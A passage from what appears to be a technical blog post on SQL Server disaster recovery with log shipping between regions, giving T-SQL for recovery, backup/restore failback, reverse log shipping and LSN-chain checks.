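-- Step 3, on EC2SQL02: if every available log backup has already been restored,
-- recover the database without restoring another file.
RESTORE DATABASE [DatabaseName] WITH RECOVERY;
GO

-- Confirm the database is online and no longer in standby before redirecting traffic.
SELECT name, state_desc, is_in_standby
FROM sys.databases
WHERE name = N'DatabaseName';
```

Run the final query on EC2SQL02 before Step 4. The database should report `ONLINE` with `is_in_standby = 0` once recovery has completed.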

Failback methods

1. Native backup/restore or rollback strategy

- Take a full backup on EC2SQL02 and copy it to SQLFCI01.

- Restore the full backup on SQLFCI01.

- Reconfigure log shipping between SQLFCI01 and EC2SQL02.
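
A minimal sketch of the backup and restore failback follows. It assumes the backup is written to a share that both servers can reach. The `\\fsx-share\failback\...` path is a hypothetical placeholder.

```sql
-- On EC2SQL02 (acting primary after failover): take the full backup.
BACKUP DATABASE [DatabaseName]
TO DISK = N'\\fsx-share\failback\DatabaseName_full.bak'   -- hypothetical path
WITH COMPRESSION, CHECKSUM;
GO

-- On SQLFCI01: verify that the backup file is readable before overwriting anything.
RESTORE VERIFYONLY
FROM DISK = N'\\fsx-share\failback\DatabaseName_full.bak'
WITH CHECKSUM;
GO

-- On SQLFCI01: overwrite the stale copy and bring the database online.
RESTORE DATABASE [DatabaseName]
FROM DISK = N'\\fsx-share\failback\DatabaseName_full.bak'
WITH REPLACE, RECOVERY, STATS = 10;
GO
```

Changes written to EC2SQL02 after the full backup is taken are not included, so stop application activity before the backup.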

2. Reverse log shipping

For DR drills or business continuity and disaster recovery (BCDR) activities, we can set up reverse log shipping to reduce the time taken to fail over. If performed carefully, it doesn’t require reinitializing the database with a full backup. It is crucial to preserve the log sequence number (LSN) chain. Perform the final log backup using the NORECOVERY option. Backing up the log with this option puts the database in a state where log backups can be restored, and it ensures that the database’s LSN chain doesn’t deviate. This procedure helps reduce the downtime needed to bring back SQLFCI01.

- Stop all activity on the log-shipped databases on SQLFCI01, and stop the log shipping jobs on SQLFCI01 and EC2SQL02.

- Take a transaction log backup of SQLFCI01 with the NORECOVERY option.

BACKUP LOG [DatabaseName]
TO DISK = 'BackupFilePathname'
WITH NORECOVERY;

- Restore the transaction log backup on EC2SQL02 with NORECOVERY.

- Reconfigure log shipping and re-enable the jobs.

- Reconfigure the application connections to SQLFCI01.
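
Because reverse log shipping depends on an unbroken LSN chain, it can help to inspect the LSN ranges before and after the restore. The queries below are a sketch that uses the backup and restore history tables in msdb. `DatabaseName` and `BackupFilePathname` are the same placeholders used in the steps above.

```sql
-- On the server that took the backups: list recent log backups and their LSN ranges.
-- In an unbroken chain, each backup's first_lsn equals the previous backup's last_lsn.
SELECT TOP (10) database_name, first_lsn, last_lsn, backup_finish_date
FROM msdb.dbo.backupset
WHERE database_name = N'DatabaseName'
  AND type = 'L'                      -- 'L' = transaction log backup
ORDER BY backup_finish_date DESC;

-- On the restoring server: read the LSN range from a backup file before restoring it.
RESTORE HEADERONLY
FROM DISK = N'BackupFilePathname';    -- placeholder path
GO

-- On the restoring server: review which backups have been restored and their LSNs.
SELECT TOP (10) rh.restore_date, rh.restore_type, bs.first_lsn, bs.last_lsn
FROM msdb.dbo.restorehistory AS rh
JOIN msdb.dbo.backupset AS bs
  ON bs.backup_set_id = rh.backup_set_id
WHERE rh.destination_database_name = N'DatabaseName'
ORDER BY rh.restore_date DESC;
```

If the next log backup's `first_lsn` is later than the `last_lsn` of the most recently restored backup, the chain has a gap and the restore fails. In that case, fall back to the full backup and restore method.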

Conclusion

A multi-Region strategy for your mission-critical SQL Server deployments is key for business continuity and disaster recovery. This blog post shows how to achieve that using log shipping for a SQL Server FCI deployment. Setting up DR using log shipping can help you save costs and meet your business requirements.

To learn more, check out Simplify your Microsoft SQL Server high availability deployments using Amazon FSx for Windows File Server.
